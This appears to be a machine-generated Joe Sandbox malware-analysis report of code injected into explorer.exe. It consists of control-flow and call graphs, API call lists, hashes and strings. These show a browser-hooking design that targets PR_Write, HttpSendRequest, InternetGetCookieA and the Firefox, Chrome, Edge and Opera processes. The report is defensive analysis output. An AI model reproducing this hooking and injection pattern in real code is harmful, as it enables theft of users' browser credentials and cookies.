                                                        control_flow_graph 511 81ece-81eec StrStrIA 512 81eee-81ef0 511->512 513 81ef5-81f35 RtlMoveMemory * 2 StrStrIA 511->513 514 81fab-81fb3 512->514 515 81fa7 513->515 516 81f37-81f48 StrStrIA 513->516 517 81fa9-81faa 515->517 516->515 518 81f4a-81f5b StrStrIA 516->518 517->514 518->515 519 81f5d-81f68 lstrlen 518->519 520 81f6a 519->520 521 81fa3-81fa5 519->521 522 81f6c-81f78 call 81ffb 520->522 521->517 525 81f7a-81f80 522->525 526 81f9b-81fa1 lstrlen 522->526 527 81f82-81f85 525->527 528 81f87-81f8a 525->528 526->521 526->522 527->526 527->528 528->526 529 81f8c-81f8f 528->529 529->526 530 81f91-81f94 529->530 530->526 531 81f96-81f99 530->531 531->515 531->526
                                                        APIs
                                                        • StrStrIA.SHLWAPI(00000000,000831D8), ref: 00081EE4
                                                        • RtlMoveMemory.NTDLL(?,00000000,00000000), ref: 00081F08
                                                        • RtlMoveMemory.NTDLL(?,?), ref: 00081F22
                                                        • StrStrIA.SHLWAPI(00000000,?), ref: 00081F31
                                                        • StrStrIA.SHLWAPI(00000000,?), ref: 00081F44
                                                        • StrStrIA.SHLWAPI(?,?), ref: 00081F57
                                                        • lstrlen.KERNEL32(00000000), ref: 00081F64
                                                        • lstrlen.KERNEL32(00000000), ref: 00081F9D
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.510177212.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: MemoryMovelstrlen
                                                        • String ID:
                                                        • API String ID: 456560858-0
                                                        • Opcode ID: 7a14b61d49639bded18d49fe900f4b0fc9897078ed695063aad06e24d9f1e285
                                                        • Instruction ID: 6da4ad79282a5736bd751d79d8e3ad9208539ada28f005c9117f4ca21c0103b0
                                                        • Opcode Fuzzy Hash: 7a14b61d49639bded18d49fe900f4b0fc9897078ed695063aad06e24d9f1e285
                                                        • Instruction Fuzzy Hash: 702190725043196ADB30BA649C85FEB7BDCAF85744F000936EBC4C3113E729D94B87A2
                                                        APIs
                                                        • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,75A7D250,?,?,00081E22), ref: 00081E5D
                                                        • CharLowerBuffA.USER32(00000000,00000000), ref: 00081E69
                                                        • lstrcmpi.KERNEL32(00000000,0065C16C), ref: 00081E81
                                                        • lstrlen.KERNEL32(00000000,?,00081E22), ref: 00082699
                                                        • RtlMoveMemory.NTDLL(0065C16C,00000000,00000000), ref: 000826A2
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.510177212.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$BuffCharLowerMemoryMovelstrcmpi
                                                        • String ID:
                                                        • API String ID: 2826435453-0
                                                        • Opcode ID: ef267b4f75cccad907b9530f99bc2299fdce0451e31b5f1636dbc808011e4daf
                                                        • Instruction ID: 01f6e81a6ba3fb045b30a4bd0ba53f7463dec2894d89fef1a73f4158b8aeafa4
                                                        • Opcode Fuzzy Hash: ef267b4f75cccad907b9530f99bc2299fdce0451e31b5f1636dbc808011e4daf
                                                        • Instruction Fuzzy Hash: 3221C6B66002105FE710AF24EC849FA77DDFFC9725B10052AEC85C7251D776990687A2
                                                        APIs
                                                        • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0008190C
                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0008191C
                                                        • CloseHandle.KERNEL32(00000000), ref: 00081966
                                                          • Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                                          • Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00081941
                                                          • Part of subcall function 00081C39: RtlMoveMemory.NTDLL(00000000,-00000040,?), ref: 00081C55
                                                          • Part of subcall function 00081972: RtlMoveMemory.NTDLL(00000000,-00000040,?), ref: 00081994
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.510177212.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: File$HeapMemoryMove$AllocateCloseCreateHandleProcessReadSize
                                                        • String ID:
                                                        • API String ID: 3402831612-0
                                                        • Opcode ID: 2be5267b56057d24c1f5efdeeaf95091aebe7c739d2765d28efaa2af9e852935
                                                        • Instruction ID: 92500d04bea994f5137bb789ba7b1fdb9588a09fa389c957eef6f3e76e100f7c
                                                        • Opcode Fuzzy Hash: 2be5267b56057d24c1f5efdeeaf95091aebe7c739d2765d28efaa2af9e852935
                                                        • Instruction Fuzzy Hash: EF01D6323002147BE2213A35DC68EEF7A9DFF86BB4F010629F5D6A21D1DA259D069770

                                                        Execution Graph

                                                        Execution Coverage:6.6%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:223
                                                        Total number of Limit Nodes:16
                                                        execution_graph 1577 82c18 1578 82c2a 1577->1578 1579 82bf2 11 API calls 1578->1579 1581 82c82 1578->1581 1580 82c45 1579->1580 1580->1581 1582 81141 2 API calls 1580->1582 1583 82c59 1582->1583 1584 82c79 1583->1584 1585 82c5d lstrlen 1583->1585 1588 8105d VirtualFree 1584->1588 1586 82678 6 API calls 1585->1586 1586->1584 1588->1581 1334 83449 RtlEnterCriticalSection 1335 8346e 1334->1335 1336 834ce 1334->1336 1335->1336 1337 835bc RtlLeaveCriticalSection 1335->1337 1367 81274 VirtualQuery 1335->1367 1336->1337 1338 81274 VirtualQuery 1336->1338 1339 834e9 1338->1339 1339->1337 1342 834fd RtlZeroMemory 1339->1342 1366 835b1 1339->1366 1408 82f3d 1342->1408 1344 81274 VirtualQuery 1346 83494 1344->1346 1346->1336 1348 83498 lstrcat 1346->1348 1347 83526 StrToIntA 1347->1337 1349 8353b 1347->1349 1369 82faa 1348->1369 1420 81141 lstrlen lstrlen 1349->1420 1356 83558 1359 83574 1356->1359 1422 8105d VirtualFree 1356->1422 1357 83595 1360 82faa 16 API calls 1357->1360 1423 8104c VirtualAlloc 1359->1423 1363 835aa 1360->1363 1365 82f1f 22 API calls 1363->1365 1364 83585 RtlMoveMemory 1364->1337 1365->1366 1366->1337 1368 8128b 1367->1368 1368->1336 1368->1344 1370 81141 2 API calls 1369->1370 1371 82fbf 1370->1371 1372 82fd1 1371->1372 1373 81141 2 API calls 1371->1373 1376 83129 1372->1376 1424 81000 GetProcessHeap RtlAllocateHeap 1372->1424 1373->1372 1375 82fe6 1425 81000 GetProcessHeap RtlAllocateHeap 1375->1425 1404 82f1f 1376->1404 1378 82ff1 RtlZeroMemory 1379 82f3d 3 API calls 1378->1379 1380 83013 1379->1380 1381 83118 1380->1381 1382 8301e StrToIntA 1380->1382 1384 81011 3 API calls 1381->1384 1382->1381 1383 83038 1382->1383 1385 82f3d 3 API calls 1383->1385 1386 83120 1384->1386 1387 83047 1385->1387 1388 81011 3 API calls 1386->1388 1387->1381 1389 83051 lstrlen 1387->1389 1388->1376 1390 82f3d 3 API calls 1389->1390 1391 83066 1390->1391 1392 81141 2 API calls 1391->1392 1393 83074 1392->1393 1393->1381 1426 81000 GetProcessHeap RtlAllocateHeap 1393->1426 1395 8308b 1396 82f3d 3 API calls 1395->1396 1397 830a4 wsprintfA 1396->1397 1427 81000 GetProcessHeap RtlAllocateHeap 1397->1427 1399 830cc 1400 82f3d 3 API calls 1399->1400 1401 830dd lstrcat 1400->1401 1428 81011 1401->1428 1403 830ee lstrcat lstrlen RtlMoveMemory 1403->1381 1405 82f3c 1404->1405 1406 82f23 CreateThread CloseHandle 1404->1406 1407 8105d VirtualFree 1405->1407 1406->1405 1433 82ed2 1406->1433 1407->1336 1409 82f4b 1408->1409 1410 82f61 1408->1410 1411 81141 2 API calls 1409->1411 1412 81141 2 API calls 1410->1412 1417 82f57 1411->1417 1413 82f66 1412->1413 1414 82fa4 1413->1414 1415 81141 2 API calls 1413->1415 1414->1337 1414->1347 1415->1417 1416 81141 2 API calls 1418 82f8e 1416->1418 1417->1414 1417->1416 1418->1414 1419 82f92 RtlMoveMemory 1418->1419 1419->1414 1421 81162 1420->1421 1421->1337 1421->1356 1421->1357 1422->1359 1423->1364 1424->1375 1425->1378 1426->1395 1427->1399 1429 81274 VirtualQuery 1428->1429 1430 81019 1429->1430 1431 8102d 1430->1431 1432 8101d GetProcessHeap HeapFree 1430->1432 1431->1403 1432->1431 1434 82edd 1433->1434 1435 82f16 RtlExitUserThread 1433->1435 1445 8178c lstrlen 1434->1445 1438 82f0e 1440 81011 3 API calls 1438->1440 1440->1435 1443 82f07 1444 81011 3 API calls 1443->1444 1444->1438 1446 817d3 1445->1446 1447 817a4 CryptBinaryToStringA 1445->1447 1446->1438 1451 81b1b 1446->1451 1447->1446 1448 817b7 1447->1448 1463 81000 GetProcessHeap RtlAllocateHeap 1448->1463 1450 817c2 CryptBinaryToStringA 1450->1446 1452 81b3e 1451->1452 1453 81b31 lstrlen 1451->1453 1464 81000 GetProcessHeap RtlAllocateHeap 1452->1464 1453->1452 1455 81b46 lstrcat 1456 81b7b lstrcat 1455->1456 1457 81b82 1455->1457 1456->1457 1465 8186c 1457->1465 1460 81011 3 API calls 1461 81ba5 1460->1461 1462 8105d VirtualFree 1461->1462 1462->1443 1463->1450 1464->1455 1488 81000 GetProcessHeap RtlAllocateHeap 1465->1488 1467 81890 1489 8106c lstrlen MultiByteToWideChar 1467->1489 1469 8189f 1490 817dc RtlZeroMemory 1469->1490 1472 818f1 RtlZeroMemory 1475 81926 1472->1475 1473 81011 3 API calls 1474 81b10 1473->1474 1474->1460 1476 81af3 1475->1476 1492 81000 GetProcessHeap RtlAllocateHeap 1475->1492 1476->1473 1478 819e2 wsprintfW 1479 81a02 1478->1479 1487 81add 1479->1487 1493 81000 GetProcessHeap RtlAllocateHeap 1479->1493 1480 81011 3 API calls 1480->1476 1482 81a70 1483 81ad6 1482->1483 1494 8104c VirtualAlloc 1482->1494 1485 81011 3 API calls 1483->1485 1485->1487 1486 81ac6 RtlMoveMemory 1486->1483 1487->1480 1488->1467 1489->1469 1491 817fe 1490->1491 1491->1472 1491->1476 1492->1478 1493->1482 1494->1486 1495 82c8a 1503 82bf2 1495->1503 1497 82c9b 1498 82ca1 lstrlen 1497->1498 1499 82cc6 1497->1499 1508 82678 1498->1508 1523 8224c 1503->1523 1507 82c09 1507->1497 1509 82721 1508->1509 1510 82691 1508->1510 1522 8105d VirtualFree 1509->1522 1510->1509 1511 81274 VirtualQuery 1510->1511 1512 826a7 1511->1512 1512->1509 1513 82753 1512->1513 1515 8279e 1512->1515 1517 826e9 1512->1517 1536 81000 GetProcessHeap RtlAllocateHeap 1513->1536 1518 827ad 1515->1518 1537 81000 GetProcessHeap RtlAllocateHeap 1515->1537 1516 82768 memcpy 1516->1509 1521 82700 memcpy 1517->1521 1520 827c7 memcpy 1518->1520 1520->1509 1521->1509 1522->1499 1534 81000 GetProcessHeap RtlAllocateHeap 1523->1534 1525 82254 1526 823e3 1525->1526 1535 8104c VirtualAlloc 1526->1535 1528 82633 1528->1507 1529 825b5 lstrcat lstrcat lstrcat lstrcat 1530 823fc 1529->1530 1530->1528 1530->1529 1531 81011 GetProcessHeap HeapFree VirtualQuery 1530->1531 1532 82346 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree VirtualQuery 1530->1532 1533 8231f GetProcessHeap RtlAllocateHeap memcpy 1530->1533 1531->1530 1532->1530 1533->1530 1534->1525 1535->1530 1536->1516 1537->1520 1538 82cce 1539 82cd7 1538->1539 1540 82d02 1539->1540 1541 82678 6 API calls 1539->1541 1541->1540 1542 83401 1543 8340a 1542->1543 1544 83442 1542->1544 1545 81274 VirtualQuery 1543->1545 1546 83412 1545->1546 1546->1544 1547 83416 RtlEnterCriticalSection 1546->1547 1552 83132 1547->1552 1550 82f1f 22 API calls 1551 8343a RtlLeaveCriticalSection 1550->1551 1551->1544 1553 8314d 1552->1553 1566 832e8 1552->1566 1553->1566 1573 81000 GetProcessHeap RtlAllocateHeap 1553->1573 1555 831cd 1574 81000 GetProcessHeap RtlAllocateHeap 1555->1574 1557 83212 1558 832d8 1557->1558 1559 8322c lstrlen 1557->1559 1560 81011 3 API calls 1558->1560 1559->1558 1561 8323d 1559->1561 1562 832df 1560->1562 1563 81141 2 API calls 1561->1563 1564 81011 3 API calls 1562->1564 1565 8324b 1563->1565 1564->1566 1565->1558 1575 81000 GetProcessHeap RtlAllocateHeap 1565->1575 1566->1550 1568 83260 1576 81000 GetProcessHeap RtlAllocateHeap 1568->1576 1570 8327f wsprintfA lstrcat 1571 81011 3 API calls 1570->1571 1572 832b8 lstrcat lstrlen RtlMoveMemory 1571->1572 1572->1558 1573->1555 1574->1557 1575->1568 1576->1570 1599 83371 1600 8337a 1599->1600 1601 833b2 1599->1601 1602 81274 VirtualQuery 1600->1602 1603 83382 1602->1603 1603->1601 1604 83386 RtlEnterCriticalSection 1603->1604 1605 83132 13 API calls 1604->1605 1606 833a3 1605->1606 1607 82f1f 22 API calls 1606->1607 1608 833aa RtlLeaveCriticalSection 1607->1608 1608->1601 1609 832f4 1610 83302 1609->1610 1611 8335f 1610->1611 1612 8332b RtlEnterCriticalSection 1610->1612 1613 83342 1612->1613 1614 8334e 1612->1614 1615 82faa 16 API calls 1613->1615 1616 83357 RtlLeaveCriticalSection 1614->1616 1617 83347 1615->1617 1616->1611 1618 82f1f 22 API calls 1617->1618 1618->1614

                                                        Callgraph

                                                        • Executed
                                                        • Not Executed
                                                        • Opacity -> Relevance
                                                        • Disassembly available
                                                        callgraph 0 Function_00081C08 25 Function_0008104C 0->25 58 Function_00081C82 0->58 72 Function_00081BAF 0->72 86 Function_00081BD2 0->86 1 Function_00083709 2 Function_00081000 1->2 11 Function_00081011 1->11 45 Function_00081363 1->45 78 Function_000815BE 1->78 3 Function_00083401 9 Function_00082F1F 3->9 18 Function_00083132 3->18 51 Function_00081274 3->51 4 Function_00088702 5 Function_00081305 6 Function_00082C18 30 Function_00081141 6->30 35 Function_0008105D 6->35 48 Function_00082678 6->48 99 Function_00082BF2 6->99 7 Function_00081B1B 7->2 7->11 40 Function_0008186C 7->40 8 Function_00082E1B 8->2 8->11 85 Function_00082ED2 9->85 10 Function_0008231F 10->2 11->51 12 Function_00089814 13 Function_00083829 13->1 74 Function_000836A1 13->74 87 Function_000835D4 13->87 14 Function_00081320 15 Function_00089321 16 Function_00082F3D 16->30 17 Function_0008133F 18->2 18->11 18->30 19 Function_00081235 20 Function_00085137 21 Function_00088A37 22 Function_00089337 23 Function_00083449 23->9 23->16 23->25 23->30 23->35 23->51 70 Function_00082FAA 23->70 24 Function_0008104A 26 Function_00081E4C 27 Function_0008224C 27->2 28 Function_00081F4E 29 Function_00083840 31 Function_00082643 32 Function_00089844 33 Function_00082346 33->2 33->11 66 Function_00082296 33->66 34 Function_00082659 36 Function_0008285F 36->30 37 Function_00089955 38 Function_0008966A 39 Function_0008106C 40->2 40->11 40->25 40->39 63 Function_00081090 40->63 84 Function_000817DC 40->84 41 Function_0008926D 42 Function_00082B6E 42->7 42->11 42->35 42->42 52 Function_00082974 42->52 54 Function_0008178C 42->54 96 Function_000827E7 42->96 43 Function_00081261 44 Function_00083862 44->0 44->2 44->5 44->11 44->13 44->14 44->19 44->30 44->43 44->51 56 Function_0008118D 44->56 60 Function_00082D9A 44->60 44->63 67 Function_00082EA8 44->67 69 Function_000812AA 44->69 82 Function_000816C7 44->82 94 Function_00081FE5 44->94 45->17 46 Function_00089763 47 Function_00081765 48->2 48->51 49 Function_00083371 49->9 49->18 49->51 50 Function_00088A71 52->2 52->11 52->25 52->30 52->35 52->36 52->47 71 Function_000828AD 52->71 53 Function_00082C8A 53->35 53->48 53->99 54->2 55 Function_00083D8D 55->2 55->44 55->51 55->55 91 Function_00083BE1 55->91 57 Function_00088B81 93 Function_00081CE5 58->93 59 Function_00085198 61 Function_0008929C 62 Function_00088A9F 64 Function_00088F93 65 Function_00082295 67->8 68 Function_000815A9 70->2 70->11 70->16 70->30 71->30 73 Function_000850A0 74->2 74->11 74->45 83 Function_000814D8 74->83 75 Function_000823A2 76 Function_00081CA5 76->93 77 Function_000833B9 77->9 77->18 77->51 78->2 78->11 78->68 78->78 79 Function_00082CCE 79->48 80 Function_000887CE 81 Function_00088CC3 83->2 83->11 89 Function_000813D7 83->89 98 Function_000813FE 83->98 85->7 85->11 85->35 85->54 86->76 87->2 87->11 87->45 87->83 88 Function_000893D4 90 Function_00088EEF 91->2 91->5 91->13 91->14 91->19 91->30 91->43 91->51 91->63 91->67 91->69 91->94 92 Function_000823E3 92->10 92->11 92->25 92->33 92->75 94->26 94->28 94->51 95 Function_000895E5 96->11 96->51 97 Function_000889F9 98->2 98->11 98->83 98->89 99->27 99->92 100 Function_000832F4 100->9 100->70

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 83862-838de call 81000 GetModuleFileNameA call 81000 GetCurrentProcessId wsprintfA call 8118d CreateMutexA GetLastError 7 838e4-83940 RtlInitializeCriticalSection PathFindFileNameA lstrcat call 81000 Sleep lstrcmpi 0->7 8 83bc5-83c3a call 81011 * 2 RtlExitUserThread call 81000 * 2 wsprintfA call 81235 0->8 14 83a0a-83a14 lstrcmpi 7->14 15 83946-83961 GetCommandLineW CommandLineToArgvW 7->15 69 83c3c-83c4c call 81141 8->69 70 83c5e 8->70 17 83a1a-83a24 lstrcmpi 14->17 18 83b14-83b39 call 816c7 GetModuleHandleA GetProcAddress 14->18 19 83bc3-83bc4 15->19 20 83967-8398b call 816c7 GetModuleHandleA GetProcAddress 15->20 17->18 24 83a2a-83a40 lstrcmpi 17->24 34 83b3b-83b47 call 81c08 18->34 35 83b4c-83b59 GetModuleHandleA GetProcAddress 18->35 19->8 32 8398d-83999 call 81c08 20->32 33 8399e-839c0 GetModuleHandleA GetProcAddress 20->33 28 83a42-83a4e GetCommandLineA StrStrIA 24->28 29 83a67-83a71 lstrcmpi 24->29 28->29 37 83a50 28->37 30 83a88-83a92 lstrcmpi 29->30 31 83a73-83a7f GetCommandLineA StrStrIA 29->31 30->19 39 83a98-83aa4 GetCommandLineA StrStrIA 30->39 31->30 38 83a81-83a86 31->38 32->33 41 839c2-839d0 GetModuleHandleA GetProcAddress 33->41 42 839d6-839e8 GetModuleHandleA GetProcAddress 33->42 34->35 44 83b5b-83b67 call 81c08 35->44 45 83b6c-83b79 GetModuleHandleA GetProcAddress 35->45 47 83a55-83a65 GetModuleHandleA 37->47 38->47 39->19 48 83aaa-83ac5 GetModuleHandleA 39->48 41->42 49 83b08-83b0f call 816c7 41->49 50 839f9-83a05 42->50 51 839ea-839f3 GetModuleHandleA GetProcAddress 42->51 44->45 54 83b7b-83b87 call 81c08 45->54 55 83b8c-83bbe call 816c7 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 45->55 56 83ace-83ad2 47->56 59 83ad8-83aea call 816c7 call 82d9a 48->59 60 83ac7-83acc GetModuleHandleA 48->60 49->19 61 83b03 call 81c08 50->61 51->49 51->50 54->55 55->19 56->19 56->59 59->49 82 83aec-83af5 call 81274 59->82 60->56 61->49 79 83c4e call 83829 69->79 80 83c53-83c59 call 81261 69->80 73 83c64-83c74 CreateToolhelp32Snapshot 70->73 76 83c7a-83c8e Process32First 73->76 77 83d7d-83d88 Sleep 73->77 81 83d6e-83d70 76->81 77->73 79->80 80->70 85 83c93-83ca5 lstrcmpi 81->85 86 83d76-83d77 CloseHandle 81->86 82->49 93 83af7-83b01 82->93 89 83cda-83ce3 call 812aa 85->89 90 83ca7-83cb5 lstrcmpi 85->90 86->77 97 83d62-83d68 Process32Next 89->97 98 83ce5-83cee call 81305 89->98 90->89 91 83cb7-83cc5 lstrcmpi 90->91 91->89 94 83cc7-83cd4 call 82ea8 91->94 93->61 94->89 94->97 97->81 98->97 102 83cf0-83cf7 call 81320 98->102 102->97 105 83cf9-83d06 call 81274 102->105 105->97 108 83d08-83d5d lstrcmpi call 81090 call 81fe5 call 81090 105->108 108->97
                                                        APIs
                                                          • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                                          • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                                        • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 00083886
                                                        • GetCurrentProcessId.KERNEL32(00000001), ref: 0008389B
                                                        • wsprintfA.USER32 ref: 000838B6
                                                          • Part of subcall function 0008118D: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 000811A9
                                                          • Part of subcall function 0008118D: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 000811C1
                                                          • Part of subcall function 0008118D: lstrlen.KERNEL32(?,00000000), ref: 000811C9
                                                          • Part of subcall function 0008118D: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 000811D4
                                                          • Part of subcall function 0008118D: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 000811EE
                                                          • Part of subcall function 0008118D: wsprintfA.USER32 ref: 00081205
                                                          • Part of subcall function 0008118D: CryptDestroyHash.ADVAPI32(?), ref: 0008121E
                                                          • Part of subcall function 0008118D: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00081228
                                                        • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 000838CD
                                                        • GetLastError.KERNEL32 ref: 000838D3
                                                        • RtlInitializeCriticalSection.NTDLL(00086038), ref: 000838F3
                                                        • PathFindFileNameA.SHLWAPI(?), ref: 000838FA
                                                        • lstrcat.KERNEL32(00085CDE,00000000), ref: 00083910
                                                        • Sleep.KERNEL32(000001F4), ref: 0008392A
                                                        • lstrcmpi.KERNEL32(00000000,firefox.exe), ref: 0008393C
                                                        • GetCommandLineW.KERNEL32(?), ref: 0008394F
                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,VirtualQuery), ref: 0008397E
                                                        • GetProcAddress.KERNEL32(00000000), ref: 00083987
                                                        • GetModuleHandleA.KERNEL32(nspr4.dll,PR_GetDescType), ref: 000839AF
                                                        • GetProcAddress.KERNEL32(00000000), ref: 000839B2
                                                        • GetModuleHandleA.KERNEL32(nss3.dll,PR_GetDescType), ref: 000839C4
                                                        • GetProcAddress.KERNEL32(00000000), ref: 000839C7
                                                        • GetModuleHandleA.KERNEL32(nspr4.dll,PR_Write), ref: 000839E1
                                                        • GetProcAddress.KERNEL32(00000000), ref: 000839E4
                                                        • GetModuleHandleA.KERNEL32(nss3.dll,PR_Write), ref: 000839EC
                                                        • GetProcAddress.KERNEL32(00000000), ref: 000839EF
                                                        • lstrcmpi.KERNEL32(00000000,chrome.exe), ref: 00083A6D
                                                        • GetCommandLineA.KERNEL32(NetworkService), ref: 00083A78
                                                        • StrStrIA.SHLWAPI(00000000), ref: 00083A7B
                                                        • lstrcmpi.KERNEL32(00000000,opera.exe), ref: 00083A8E
                                                        • GetCommandLineA.KERNEL32(NetworkService), ref: 00083A9D
                                                        • StrStrIA.SHLWAPI(00000000), ref: 00083AA0
                                                        • GetModuleHandleA.KERNEL32(opera.dll), ref: 00083ABF
                                                        • GetModuleHandleA.KERNEL32(opera_browser.dll), ref: 00083ACC
                                                        • CommandLineToArgvW.SHELL32(00000000), ref: 00083956
                                                          • Part of subcall function 000816C7: GetCurrentProcessId.KERNEL32 ref: 000816D9
                                                          • Part of subcall function 000816C7: GetCurrentThreadId.KERNEL32 ref: 000816E1
                                                          • Part of subcall function 000816C7: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 000816F1
                                                          • Part of subcall function 000816C7: Thread32First.KERNEL32(00000000,0000001C), ref: 000816FF
                                                          • Part of subcall function 000816C7: CloseHandle.KERNEL32(00000000), ref: 00081758
                                                        • lstrcmpi.KERNEL32(00000000,iexplore.exe), ref: 00083A10
                                                        • lstrcmpi.KERNEL32(00000000,microsoftedgecp.exe), ref: 00083A20
                                                        • lstrcmpi.KERNEL32(00000000,msedge.exe), ref: 00083A30
                                                        • GetCommandLineA.KERNEL32(NetworkService), ref: 00083A47
                                                        • StrStrIA.SHLWAPI(00000000), ref: 00083A4A
                                                        • GetModuleHandleA.KERNEL32(chrome.dll), ref: 00083A5F
                                                        • GetModuleHandleA.KERNEL32(wininet.dll,HttpSendRequestA), ref: 00083B2C
                                                        • GetProcAddress.KERNEL32(00000000), ref: 00083B35
                                                        • GetModuleHandleA.KERNEL32(wininet.dll,HttpSendRequestW), ref: 00083B52
                                                        • GetProcAddress.KERNEL32(00000000), ref: 00083B55
                                                        • GetModuleHandleA.KERNEL32(wininet.dll,InternetWriteFile), ref: 00083B72
                                                        • GetProcAddress.KERNEL32(00000000), ref: 00083B75
                                                        • GetModuleHandleA.KERNEL32(wininet.dll,HttpQueryInfoA), ref: 00083B99
                                                        • GetProcAddress.KERNEL32(00000000), ref: 00083B9C
                                                        • GetModuleHandleA.KERNEL32(wininet.dll,InternetQueryOptionA), ref: 00083BA9
                                                        • GetProcAddress.KERNEL32(00000000), ref: 00083BAC
                                                        • GetModuleHandleA.KERNEL32(wininet.dll,InternetGetCookieA), ref: 00083BB9
                                                        • GetProcAddress.KERNEL32(00000000), ref: 00083BBC
                                                          • Part of subcall function 00081C08: RtlMoveMemory.NTDLL(00000000,?,00000000), ref: 00081C42
                                                        • RtlExitUserThread.NTDLL(00000000), ref: 00083BD9
                                                        • wsprintfA.USER32 ref: 00083C1F
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00083C69
                                                        • Process32First.KERNEL32(00000000,?), ref: 00083C88
                                                        • CloseHandle.KERNELBASE(00000000), ref: 00083D77
                                                        • Sleep.KERNELBASE(000003E8), ref: 00083D82
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Handle$Module$AddressProc$Cryptlstrcmpi$CommandLine$CreateHash$CurrentProcesswsprintf$CloseContextFileFirstHeapNameSleepSnapshotThreadToolhelp32$AcquireAllocateArgvCriticalDataDestroyErrorExitFindInitializeLastMemoryMoveMutexParamPathProcess32ReleaseSectionThread32Userlstrcatlstrlen
                                                        • String ID: %s%d%d%d$%s%s$HttpQueryInfoA$HttpSendRequestA$HttpSendRequestW$InternetGetCookieA$InternetQueryOptionA$InternetWriteFile$NetworkService$PR_GetDescType$PR_Write$VirtualQuery$chrome.dll$chrome.exe$fgclearcookies$firefox.exe$iexplore.exe$kernel32.dll$microsoftedgecp.exe$msedge.dll$msedge.exe$nspr4.dll$nss3.dll$opera.dll$opera.exe$opera_browser.dll$wininet.dll
                                                        • API String ID: 2480436012-2618538661
                                                        • Opcode ID: b9f6ff7a843870f369ebe3c7313e7c28a896d86895adef5c6821e2817a989fd5
                                                        • Instruction ID: 4080beb071130776e6dd09e7f3c374191be514a04634faf7e68f9b4ce61aff03
                                                        • Opcode Fuzzy Hash: b9f6ff7a843870f369ebe3c7313e7c28a896d86895adef5c6821e2817a989fd5
                                                        • Instruction Fuzzy Hash: AEA1D370A40716A7E71077719C49E6F3A9CBF91B41B120524F6C1AB292EF79C9028FA6

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 159 83d8d-83d97 call 81274 162 83d99-83dc2 call 81000 RtlMoveMemory 159->162 163 83e03-83e04 159->163 166 83de8-83dfc NtUnmapViewOfSection 162->166 167 83dc4-83de2 call 81000 RtlMoveMemory 162->167 169 83e0a-83e15 call 83be1 166->169 170 83dfe-83dff 166->170 167->166 177 83e20-83e23 169->177 178 83e17-83e1b call 83d8d 169->178 170->163 172 83e01-83e05 call 83862 170->172 172->169 178->177
                                                        APIs
                                                          • Part of subcall function 00081274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00081281
                                                          • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                                          • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                                        • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00083DAF
                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00083DE2
                                                        • NtUnmapViewOfSection.NTDLL(000000FF), ref: 00083DEB
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: HeapMemoryMove$AllocateProcessQuerySectionUnmapViewVirtual
                                                        • String ID:
                                                        • API String ID: 4050682147-0
                                                        • Opcode ID: 0bdd0153c5d571ba371ff687eaf063fdcaa43c021457fa3483b6ad3aa1bdb115
                                                        • Instruction ID: dcd502424e309425fe8eb10f29b26712ba654105e7724c8cb1046160188aa2ce
                                                        • Opcode Fuzzy Hash: 0bdd0153c5d571ba371ff687eaf063fdcaa43c021457fa3483b6ad3aa1bdb115
